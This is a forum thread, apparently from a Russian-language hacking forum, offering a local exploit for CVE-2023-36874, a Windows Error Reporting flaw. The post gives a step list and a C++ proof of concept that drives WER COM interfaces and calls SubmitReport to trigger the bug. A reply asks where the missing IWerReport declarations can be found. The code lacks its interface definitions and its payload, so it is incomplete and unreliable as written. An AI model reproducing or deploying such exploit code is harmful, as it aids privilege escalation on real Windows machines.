Local CVE-2023-36874

0x00x0 · 21.08.2023

C-подобный:

# The exploit follows these steps to trigger the vulnerability:

    Initialize COM by calling CoInitialize(NULL).
    Create COM interfaces to interact with WER:
        Create an instance of CLSID_ERCLuaSupport to obtain an IErcLuaSupport interface.
        Use IErcLuaSupport to create an IWerStoreFactory instance.
        Create an IWerStore instance using IWerStoreFactory.
    Start the report enumeration process by calling pIWerStore->EnumerateStart().
    Load a report using pIWerStore->LoadReport function. Replace "ReportName" with the actual report name you want to exploit.
    Submit the loaded report to trigger the vulnerability by calling pIWerReport->SubmitReport().
    Release the COM interfaces and clean up the resources:
        pIWerReport->Release()
        pIWerStore->Release()
        pIWerStoreFactory->Release()
        pIErcLuaSupport->Release()
    Uninitialize COM by calling CoUninitialize().

PoC

C++:

#include <Windows.h>
#include <iostream>

int main() {
    // Initialize COM by calling CoInitialize(NULL).
    CoInitialize(NULL);

    // Create COM interfaces for interacting with WER:
    IWerReport* pIWerReport = nullptr;
    IErcLuaSupport* pIErcLuaSupport = nullptr;
    IWerStoreFactory* pIWerStoreFactory = nullptr;
    IWerStore* pIWerStore = nullptr;

    // Create an instance of CLSID_ERCLuaSupport to get an IErcLuaSupport interface.
    CoCreateInstance(CLSID_ERCLuaSupport, NULL, CLSCTX_LOCAL_SERVER, IID_IErcLuaSupport, (PVOID*)&pIErcLuaSupport);

    // Use IErcLuaSupport to create an IWerStoreFactory instance.
    pIErcLuaSupport->CoCreateIWerStoreFactory(&pIWerStoreFactory);

    // Create an IWerStore instance using IWerStoreFactory.
    pIWerStoreFactory->CoCreateIWerStore(&pIWerStore);

    // Exploit steps
    // Enumerate and start the report retrieval process by calling pIWerStore->EnumerateStart().
    pIWerStore->EnumerateStart();

    // Load a report using the pIWerStore->LoadReport function. Replace "ReportName" with the actual report name you want to exploit.
    pIWerStore->LoadReport(L"ReportName", &pIWerReport);

    // Submit the loaded report to trigger the vulnerability by calling pIWerReport->SubmitReport().
    pIWerReport->SubmitReport();

    // Clean up
    // Release the COM interfaces and clean up the resources.
    pIWerReport->Release();
    pIWerStore->Release();
    pIWerStoreFactory->Release();
    pIErcLuaSupport->Release();

    // Uninitialize COM by calling CoUninitialize().
    CoUninitialize();

    return 0;
}

Exploit.IN Send

Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.

send.exploit.in

nazgul · 22.08.2023

Привет!

Знаете ли вы, где найти декларации IWerReport COM? Спасибо!

Local CVE-2023-36874

0x00x0

HDD-drive

Exploit.IN Send

nazgul

floppy-диск